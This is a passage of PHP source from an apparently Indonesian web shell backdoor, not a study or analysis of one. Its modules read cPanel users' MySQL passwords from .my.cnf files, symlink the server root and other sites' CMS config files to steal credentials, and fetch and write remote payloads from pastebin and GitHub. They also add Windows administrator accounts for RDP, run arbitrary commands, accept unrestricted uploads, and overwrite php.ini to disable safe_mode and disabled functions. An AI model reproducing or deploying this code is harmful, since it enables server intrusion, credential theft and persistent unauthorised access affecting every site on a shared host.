1247. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1248. $dirz = '/home/'.$owner['name'].'/.my.cnf';
1249. $path = getcwd();
1250.  
1251. if (is_readable($dirz)) {
1252. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
1253. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
1254. $password=entre2v2($p,'password="','"');
1255. echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
1256. $dc++;
1257. }
1258.  
1259. }
1260. }
1261. echo '</table>';
1262. $total = $dc;
1263. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
1264. echo '</center>';
1265. }else{
1266. $d0mains = @file('/etc/named.conf');
1267. if($d0mains) {
1268. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
1269. $count=1;
1270. $dc = 0;
1271. $mck = array();
1272. foreach($d0mains as $d0main){
1273. if(@eregi('zone',$d0main)){
1274. preg_match_all('#zone "(.*)"#',$d0main,$domain);
1275. flush();
1276. if(strlen(trim($domain[1][0])) >2){
1277. $mck[] = $domain[1][0];
1278. }
1279. }
1280. }
1281. $mck = array_unique($mck);
1282. $usr = array();
1283. $dmn = array();
1284. foreach($mck as $o) {
1285. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
1286. $usr[] = $infos['name'];
1287. $dmn[] = $o;
1288. }
1289. array_multisort($usr,$dmn);
1290. $dt = file('/etc/passwd');
1291. $passwd = array();
1292. foreach($dt as $d) {
1293. $r = explode(':',$d);
1294. if(strpos($r[5],'home')) {
1295. $passwd[$r[0]] = $r[5];
1296. }
1297. }
1298. $l=0;
1299. $j=1;
1300. foreach($usr as $r) {
1301. $dirz = '/home/'.$r.'/.my.cnf';
1302. $path = getcwd();
1303. if (is_readable($dirz)) {
1304. copy($dirz, ''.$path.'/'.$r.'.txt');
1305. $p=file_get_contents(''.$path.'/'.$r.'.txt');
1306. $password=entre2v2($p,'password="','"');
1307. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
1308. $dc++;
1309. flush();
1310. $l=$l?0:1;
1311. $j++;
1312. }
1313. }
1314. }
1315. echo '</table>';
1316. $total = $dc;
1317. echo '<br><h3>Total cPanel Found = '.$total.'</h3><br />';
1318. echo '</center>';
1319.  
1320. }
1321. }else{
1322. echo "<h3><i><font color='red'>ERROR</font><br><font color='red'>/var/named</font> or <font color='red'>etc/named.conf</font> Not Accessible!</i></h3>";
1323. }
1324.  
1325. echo "</body></html>";
1326. break;
1327. }
1328.  
1329. ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
1330. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////END OF CPANEL TOOLS//////////////////////////////
1331. ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
1332.  
1333.  
1334. elseif(isset($_GET['x']) && ($_GET['x'] == 'vn'))
1335. {
1336. ?>
1337. <form action="?path=<?php echo $path; ?>&amp;x=vn" method="post">
1338. <center><h2>Domain Viewer</h2></center><br><br>
1339. <?php
1340. function openBaseDir()
1341. {
1342. $openBaseDir = ini_get("open_basedir");
1343. if (!$openBaseDir)
1344. {
1345. $openBaseDir = '<font color="green">OFF</font>';
1346. }
1347. else
1348. {
1349. $openBaseDir = '<font color="red">ON</font>';
1350. }
1351. return $openBaseDir;
1352. }
1353.  
1354.  
1355. echo '
1356. <table width="95%" cellspacing="0" cellpadding="0" >
1357. <td height="100" align="left" >';
1358. $pg = basename(__FILE__);
1359. $safe_mode = @ini_get('safe_mode');
1360. $dir = @getcwd();
1361. ////////////////////////////////////////////////////
1362. #.htaccess
1363. @mkdir('pee',0777);
1364. @symlink("/","pee/root");
1365. $htaccss = "Options all
1366. DirectoryIndex Sux.html
1367. AddType text/plain .php
1368. AddHandler server-parsed .php
1369. AddType text/plain .html
1370. AddHandler txt .html
1371. Require None
1372. Satisfy Any";
1373.  
1374. file_put_contents("pee/.htaccess",$htaccss);
1375. $etc = file_get_contents("/etc/passwd");
1376. $etcz = explode("\n",$etc);
1377.  
1378.  
1379. ##Symlink to the ROOT :p
1380. foreach($etcz as $etz){
1381. $etcc = explode(":",$etz);
1382. error_reporting(0);
1383.  
1384. $current_dir = posix_getcwd();
1385. $dir = explode("/",$current_dir);
1386.  
1387. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1388. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1389. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1390. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1391. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"pee/".$etcc[0].'-PhpBB.txt');
1392. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"pee/".$etcc[0].'-vBulletin.txt');
1393. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1394. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1395. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1396. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1397. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"pee/".$etcc[0].'-IPB.txt');
1398. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"pee/".$etcc[0].'-MyBB.txt');
1399. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"pee/".$etcc[0].'-SMF.txt');
1400. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"pee/".$etcc[0].'-Drupal.txt');
1401. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"pee/".$etcc[0].'-e107.txt');
1402. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"pee/".$etcc[0].'-Seditio.txt');
1403. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"pee/".$etcc[0].'-osCommerce.txt');
1404. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1405. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1406. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1407. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1408. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1409. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1410. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1411. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1412. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1413. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1414. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1415. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1416. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1417. }
1418. #############################
1419. if(is_readable("/var/named")){
1420. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1421. echo'<tr><td><center><b>SITE</b></center></td><td>
1422. <center><b>USER</b></center></td>
1423. <td></center><b>SYMLINK</b></center></td>';
1424. $list = scandir("/var/named");
1425. foreach($list as $domain){
1426. if(strpos($domain,".db")){
1427. $i += 1;
1428. $domain = str_replace('.db','',$domain);
1429. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1430.  
1431. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
1432. <td class='td1'><center><font color='red'>".$owner['name']."</font></center></td>
1433. <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1434. }
1435. }
1436. echo "<center>Total Domains Found: ".$i."</center><br />";
1437. }else{
1438. echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
1439.  
1440. break;
1441.  
1442. ##################################
1443. error_reporting(0);
1444. $etc = file_get_contents("/etc/passwd");
1445. $etcz = explode("\n",$etc);
1446. if(is_readable("/etc/passwd")){
1447.  
1448. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1449. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
1450.  
1451. $list = scandir("/var/named");
1452.  
1453. foreach($etcz as $etz){
1454. $etcc = explode(":",$etz);
1455.  
1456. foreach($list as $domain){
1457. if(strpos($domain,".db")){
1458. $domain = str_replace('.db','',$domain);
1459. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1460. if($owner['name'] == $etcc[0])
1461. {
1462. $i += 1;
1463. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center>
1464. <td class='td1'><font color='red'>".$owner['name']."</font></center></td>
1465. <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1466. }}}}
1467. echo "<center>Total Domains Found: ".$i."</center><br />";}
1468.  
1469. break;
1470. ###############################
1471. if(is_readable("/etc/named.conf")){
1472. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1473. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
1474. $named = file_get_contents("/etc/named.conf");
1475. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
1476. foreach($domains[1] as $domain){
1477. $domain = trim($domain);
1478. $i += 1;
1479. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1480. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1481. }
1482. echo "<center>Total Domains Found: ".$i."</center><br />";
1483.  
1484. } else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; }
1485.  
1486. break;
1487. ############################
1488. if(is_readable("/etc/valiases")){
1489. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1490. echo'<tr><td><center><b>SITE</b></center></td><td>
1491. <center><b>USER</b></center></td><td></center>
1492. <b>SYMLINK</b></center></td>';
1493. $list = scandir("/etc/valiases");
1494. foreach($list as $domain){
1495. $i += 1;
1496. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1497. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
1498. <center><td class='td1'><font color='red'>".$owner['name']."</font></center></td>
1499. <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1500. }
1501. echo "<center>Total Domains Found: ".$i."</center><br />";
1502. } else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
1503.  
1504. break;
1505. }
1506.  
1507. ///DUMP
1508. elseif(isset($_GET['x']) && ($_GET['x'] == 'dump'))
1509. {
1510. ?>
1511. <br/><br/>
1512. <form action="?path=<?php echo $path; ?>&amp;x=dump" method="post">
1513. <?php
1514. $pilih = $_POST['pilihan'];
1515. echo'<center>
1516. <table border=1>
1517. <select class="bordergaya" align="left" name="pilihan" id="pilih">
1518. <option value="dumper">Gate 1</option>
1519. </select>
1520. <input type="submit" name="submites" class="bordergaya" value="Click here for Dump Email">';?><?php
1521. if ( $pilih == "dumper") {
1522. $files = file_get_contents("http://pastebin.com/raw/HhiURUER");
1523. file_put_contents("dumper.php",$files);
1524. echo "<script>alert('Done! Access dumper.php for processing'); hideAll();</script>";
1525. echo "<a href=".'dumper.php'." target=_blank><br/><br/><b>dumper.php [Click here]</b></a></center>";
1526. die();
1527. }
1528. echo'</td></form></tr></table>';
1529. break;
1530. }
1531.  
1532. ///menu rdp
1533. if(isset($_GET['x']) && ($_GET['x'] == 'krdp'))
1534. /* By Shor7cut */
1535. /* Interface By Putra-Attacker*/
1536. {
1537. if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
1538. {
1539. ?><br/><br/>
1540. <div id="content-left">
1541. <form action="" method="post">
1542. <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
1543. <tr>
1544. <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">CREATE RDP</font></td>
1545. </tr>
1546. <tr>
1547. <td><font class='kecew'>Username</font></td>
1548. <td><font class='kecew'> : </font></td>
1549. <td><input type="text" class="bordergaya" name="username" required></td>
1550. </tr>
1551. <tr>
1552. <td><font class='kecew'>Password</font></td>
1553. <td><font class='kecew'> : </font></td>
1554. <td><input type="text" class="bordergaya" name="password" required></td>
1555. </tr>
1556. <tr>
1557. <td colspan="3" align="center"><input type="hidden" name="kshell" value="1"><input type="submit" name="submit" class="bordergaya" value="Create"></td>
1558. </tr>
1559. </table>
1560. </form>
1561. </div>
1562. <br/>
1563. <div id="content-left">
1564. <form action="" method="post">
1565. <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
1566. <tr>
1567. <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">OPTION</td>
1568. </tr>
1569. <tr>
1570. <td><font class='kecew'>Username</font></td>
1571. <td><font class='kecew'> : </font></td>
1572. <td><input type="text" name="rusername" placeholder="Masukan Username" class="bordergaya"></td>
1573. </tr>
1574. <tr>
1575. <td><font class='kecew'>Password</font></td>
1576. <td><font class='kecew'> : </font></td>
1577. <td><input type="text" name="gantipw" placeholder="Password Baru" class="bordergaya"></td>
1578. </tr>
1579. <tr>
1580. <td><font class='kecew'>Action</font></td>
1581. <td><font class='kecew'> : </font></td>
1582. <td>
1583. <select name="aksi" class="bordergaya">
1584. <option value="1">Tampilkan Username</option>
1585. <option value="2">Hapus Username</option>
1586. <option value="3">Ubah Password</option>
1587. </select>
1588. </td>
1589. </tr>
1590. <tr>
1591. <td colspan="3" align="center"><input type="hidden" name="kshell" value="2"><input type="submit" name="submit" class="bordergaya" value="Execute"></td>
1592. </tr>
1593. </table>
1594. </form>
1595. <br/>
1596. </div>
1597. </center></center>
1598. <?php
1599. if($_POST['submit'])
1600. {
1601. if($_POST['kshell']=="1")
1602. {
1603. $r_user = $_POST['username'];
1604. $r_pass = $_POST['password'];
1605. $cmd_cek_user = shell_exec("net user");
1606. if(preg_match("/$r_user/", $cmd_cek_user)){
1607. echo $gaya_root.$r_user." sudah ada".$o;
1608. }else {
1609. $cmd_add_user = shell_exec("net user ".$r_user." ".$r_pass." /add");
1610. $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
1611. $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
1612. $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
1613. if($cmd_add_user){
1614. echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='greenyellow'>Berhasil!</font></font><br/><br/>".$o;
1615. }else {
1616. echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='red'>Gagal!</font><br/><br/>".$o;
1617. }
1618. echo "<font class='rapihbanget'>[+] Sedang Memroses User.. Silahkan Tunggu Sebentar.. <br/>";
1619. if($cmd_add_groups1){
1620. echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
1621. }else
1622. if($cmd_add_groups2){
1623. echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
1624. }else
1625. if($cmd_add_groups3){
1626. echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
1627. }else {
1628. echo $gaya_root."<font class='rapihbanget'>--- Maaf User ".$r_user." <font color='red'>Gagal Di Proses!</font><br/><br/>".$o;
1629. }
1630. echo "<font class='rapihbanget'>[+] Server Info : </font><br/>";
1631. echo $gaya_root."<font class='rapihbanget'>--- ServerIP : ".$_SERVER["HTTP_HOST"]."</font><br/><font class='rapihbanget'>--- Username : ".$r_user."</font><br/><font class='rapihbanget'>--- Password : </font>".$r_pass.$o."</font><br/><br/>";
1632. echo "<font class='rapihbanget'>[+] Thank For Using It ~_^ </font><br/><br/>";
1633. }
1634.  
1635.  
1636. }
1637. else if($_POST['kshell']=="2")
1638. {
1639. echo "<style>
1640. .coeg{margin-left:30%;}
1641. </style>";
1642. if($_POST['aksi']=="1"){
1643. echo "<pre class='coeg'>".shell_exec("net user");
1644. }
1645. else if($_POST['aksi']=="2")
1646. {
1647. $username = $_POST['rusername'];
1648. $cmd_cek_user = shell_exec("net user");
1649. if (!empty($username)){
1650. if(preg_match("/$username/", $cmd_cek_user)){
1651. $cmd_add_user = shell_exec("net user ".$username." /DELETE");
1652. if($cmd_add_user){
1653. echo "<font class='rapihbanget'>[+] Sedang Memroses.. Silahkan Tunggu.. </font><br /><br />";
1654. echo $gaya_root."<font class='rapihbanget'>[+] Selamat! Remove User </font><font color='orange'>".$username." </font><font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
1655. }else {
1656. echo $gaya_root."<font class='rapihbanget'>[+] Yah :( Remove User </font><font color='orange'>".$username." </font><font color='red'>Gagal!!</font><br /><br />".$o;
1657. }
1658. }else {
1659. echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
1660. }
1661. }else {
1662. echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
1663. }
1664. }
1665. else if($_POST['aksi']=="3")
1666. {
1667. echo "<style>
1668. .tengahaja{margin-left:35%}
1669. </style>";
1670. $username = $_POST['rusername'];
1671. $password = $_POST['gantipw'];
1672. $cmd_cek_user = shell_exec("net user");
1673. if (!empty($username)){
1674. if(preg_match("/$username/", $cmd_cek_user)){
1675. $cmd_add_user = shell_exec("net user ".$username."");
1676. if($cmd_add_user){
1677. echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
1678. }else {
1679. echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='red'>Gagal!!</font><br /><br />".$o;
1680. }
1681. }else
1682. {
1683. echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
1684. }
1685. }else
1686. {
1687. echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
1688. }
1689. }
1690. }
1691.  
1692. }
1693. } else{
1694. echo "<br><br><font color='springgreen' face='Fredericka The Great'>TOOLS GAK BISA DI PAKE NDAN -_- SERVERNYA BUKAN WINDOWS</font>";
1695. }break;
1696. }
1697.  
1698. /*
1699. AUTO UPLOAD
1700. START HERE
1701. */
1702.  
1703. elseif(isset($_GET['x']) && ($_GET['x'] == 'fcrot'))
1704. {
1705. echo'<center><br><br><h3>File Creator [Auto upload]</h3>
1706. <table>
1707. <tr><form method="post" action="">&nbsp;<td>
1708. <select class="bordergaya" align="left" name="pilihan" id="pilih">
1709. <option value="hsphere">Bypass hSphere Shell</option>
1710. <option value="adminer">Adminer</option>
1711. </select>
1712. <input type="submit" name="submites" class="bordergaya" value="create">
1713. </td></form></tr></table>';
1714. error_reporting(0);
1715. set_time_limit(0);
1716. $submit = $_POST ['submites'];
1717. if(isset($submit)) {
1718. $pilih = $_POST['pilihan'];
1719. ///hsphere shell
1720. if ( $pilih == 'hsphere') {
1721. $files = file_get_contents("https://raw.githubusercontent.com/sinkaroid/pasirmerah/sc0/sc0hsphere.php");
1722. file_put_contents("hsphere.php",$files);
1723. echo "<script>alert('Bypass hsphere shell created!'); hideAll();</script>";
1724. echo "<a href="."hsphere.php"." target=_blank><b>hsphere.php [Click here]</b></a></center>";
1725. die();
1726. }
1727.  
1728. elseif ( $pilih == 'adminer') {
1729. getfile("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php");
1730. echo "<script>alert('adminer created!'); hideAll();</script>";
1731. echo "<a href="."adminer.php"." target=_blank><b>adminer.php [Click here]</b></a></center>";
1732. die();
1733. }
1734.  
1735. }break;
1736. }
1737.  
1738.  
1739. elseif(isset($_GET['x']) && ($_GET['x'] == 'korong'))
1740. {
1741. echo '<center><br /><br />
1742. <form enctype="multipart/form-data" method="POST">
1743. <input type="file" name="file" id="file" class="inputfile inputfile-4" />
1744. <label for="file">
1745. <figure>
1746. <svg xmlns="http://www.w3.org/2000/svg" width="20" height="17" viewBox="0 0 20 17"><path d="M10 0l-5.2 4.9h3.3v5.1h3.8v-5.1h3.3l-5.2-4.9zm9.3 11.5l-3.2-2.1h-2l3.4 2.6h-3.5c-.1 0-.2.1-.2.1l-.8 2.3h-6l-.8-2.2c-.1-.1-.1-.2-.2-.2h-3.6l3.4-2.6h-2l-3.2 2.1c-.4.3-.7 1-.6 1.5l.6 3.1c.1.5.7.9 1.2.9h16.3c.6 0 1.1-.4 1.3-.9l.6-3.1c.1-.5-.2-1.2-.7-1.5z"/></svg>
1747. </figure>
1748. <span>Silahkan Pilih File</span>
1749. </label>';
1750. ?>
1751. <script type="text/javascript">
1752. /*
1753. By Osvaldas Valutis, www.osvaldas.info
1754. Available for use under the MIT License
1755. */
1756.  
1757. 'use strict';
1758.  
1759. ;( function ( document, window, index )
1760. {
1761. var inputs = document.querySelectorAll( '.inputfile' );
1762. Array.prototype.forEach.call( inputs, function( input )
1763. {
1764. var label = input.nextElementSibling,
1765. labelVal = label.innerHTML;
1766.  
1767. input.addEventListener( 'change', function( e )
1768. {
1769. var fileName = '';
1770. if( this.files && this.files.length > 1 )
1771. fileName = ( this.getAttribute( 'data-multiple-caption' ) || '' ).replace( '{count}', this.files.length );
1772. else
1773. fileName = e.target.value.split( '\\' ).pop();
1774.  
1775. if( fileName )
1776. label.querySelector( 'span' ).innerHTML = fileName;
1777. else
1778. label.innerHTML = labelVal;
1779. });
1780.  
1781. // Firefox bug fix
1782. input.addEventListener( 'focus', function(){ input.classList.add( 'has-focus' ); });
1783. input.addEventListener( 'blur', function(){ input.classList.remove( 'has-focus' ); });
1784. });
1785. }( document, window, 0 ));
1786. </script>
1787. <?php
1788. echo'<br/>
1789. <input type="submit" class="tombolupil" value="Upload File!" />
1790. </form>';
1791. if(isset($_FILES['file'])){
1792. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
1793. echo '<script>alert("File Sukses Di Upload!");</script>';
1794. }else{
1795. echo '<script>alert("File Gagal Di Upload!");</script>';
1796. }
1797. }
1798. echo "</center><br /><br />";
1799. break;
1800. }
1801.  
1802. ///////////////////////////
1803.  
1804. ////////////////////////CMD////////////////////////
1805.  
1806. elseif(isset($_GET['x']) && ($_GET['x'] == 'cmd')) {
1807. echo "<br/><br/><form method='post'>
1808. <font clss='rapihbanget'>Command :</font>
1809. <input class='bordergaya' type='text' size='30' height='10' name='cmd'><input type='submit' class='bordergaya' name='execmd' value=' Execute '>
1810. </form>";
1811. if($_POST['execmd']) {
1812. echo "<pre>".exe($_POST['cmd'])."</pre>";
1813. }
1814. }
1815.  
1816. ///////////////////////////////////////////////////
1817.  
1818. //////////////////////////////////////////////////
1819. //////////////////////////////////////////////////
1820. elseif(isset($_GET['x']) && ($_GET['x'] == 'bypstuls'))
1821. {
1822. echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>"; ?>
1823. <a href="?<?php echo "path=".$path; ?>&amp;x=bysysfuncwsf"><input class=bordergaya type=submit value="Bypass Root Path With System Function" /></a>
1824. Or <a href="?<?php echo "path=".$path; ?>&amp;x=bypsini"><input class=bordergaya type=submit value="Bypass Disable Functions" /></a>
1825. Or <a href="?<?php echo "path=".$path; ?>&amp;x=bysysfuncwexec"><input class=bordergaya type=submit value="Bypass Root Path With Exec Function" /></a>
1826. <br/><br/><br/><br/>
1827. <?php
1828. }
1829. //////////////////////////////////////////////////
1830. //////////////////////////////////////////////////
1831.  
1832. ////////////////////////////////////////
1833. ///////////////////////////////////////
1834. elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwsf')) {
1835. echo '<br><center><span style="font-size:20px; font-family:Fredericka the Great; color:orange">Bypass Root Path With System Function</span><center>';
1836. mkdir('bysyswsf', 0755);
1837. chdir('bysyswsf');
1838. $bysyswsf = file_get_contents("http://pastebin.com/raw/nUTTPQnm");
1839. $file = fopen("bysyswsf.php" ,"w+");
1840. $write = fwrite ($file ,$bysyswsf);
1841. fclose($file);
1842. chmod("bysyswsf.php",0755);
1843. echo "<iframe src=bysyswsf/bysyswsf.php width=70% height=70% frameborder=0></iframe>";
1844. }
1845. ////////////////////////////////////////
1846. ////////////////////////////////////////
1847. elseif(isset($_GET['x']) && ($_GET['x'] == 'bypsini')) {
1848. $byht = "safe_mode = Off
1849. disable_functions = None
1850. safe_mode_gid = OFF
1851. open_basedir = OFF
1852. allow_url_fopen = On";
1853. file_put_contents("php.ini",$byht);
1854. echo "<script>alert('Congrats! Sukses Bos Q ~_^'); hideAll();</script>";
1855. die('<meta http-equiv="refresh" content="0; url=?" />');
1856. }
1857. ////////////////////////////////////////
1858. ///////////////////////////////////////
1859. elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwexec')) {
1860. echo '<br><center><span style="font-size:20px; font-family:Fredericka the Great; color:orange">Bypass Root Path With Exec Function</span><center>';
1861. mkdir('bysyswexecf', 0755);
1862. chdir('bysyswexecf');
1863. $bysyswsf = file_get_contents("http://pastebin.com/raw/KJiLdADd");
1864. $file = fopen("bysyswexecf.php" ,"w+");
1865. $write = fwrite ($file ,$bysyswsf);
1866. fclose($file);
1867. chmod("bysyswexecf.php",0755);
1868. echo "<iframe src=bysyswexecf/bysyswexecf.php width=70% height=70% frameborder=0></iframe>";
1869. }
1870. ////////////////////////////////////////
1871. ////////////////////////////////////////
1872.  
1873. ///////////////////////////////////////////////////////////////////////////
1874. ///////////JUMPING////////////////////////////////////////////////////////
1875. //////////////////////////////////////////
1876. elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){
1877. ?>
1878. <form action="?path=<?php echo $pwd; ?>&amp;x=jumping" method="post">
1879. <?php
1880. //radable public_html
1881. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
1882. set_time_limit(0);
1883. ###################
1884. @$passwd = fopen('/etc/passwd','r');
1885. if (!$passwd) { die('<br>[-] Error : coudn`t read /etc/passwd'); }
1886. $pub = array();
1887. $users = array();
1888. $conf = array();
1889. $i = 0;
1890. while(!feof($passwd))
1891. {
1892. $str = fgets($passwd);
1893. if ($i > 35)
1894. {
1895. $pos = strpos($str,':');
1896. $username = substr($str,0,$pos);
1897. $dirz = '/home/'.$username.'/public_html/';
1898. if (($username != ''))
1899. {
1900. if (is_readable($dirz))
1901. {
1902. array_push($users,$username);
1903. array_push($pub,$dirz);
1904. }
1905. }
1906. }
1907. $i++;
1908. }
1909. ###################
1910. echo '<br><br></center></center>';
1911. echo "<font class='rapihbanget'>[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br /></font>";
1912. echo "<font class='rapihbanget'>[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br /></font>";
1913. echo "<font class='rapihbanget'>[~] Searching for passwords in config files...<br /><br /></font>";
1914. foreach ($users as $user)
1915. {
1916. $path = "/home/$user/public_html/";
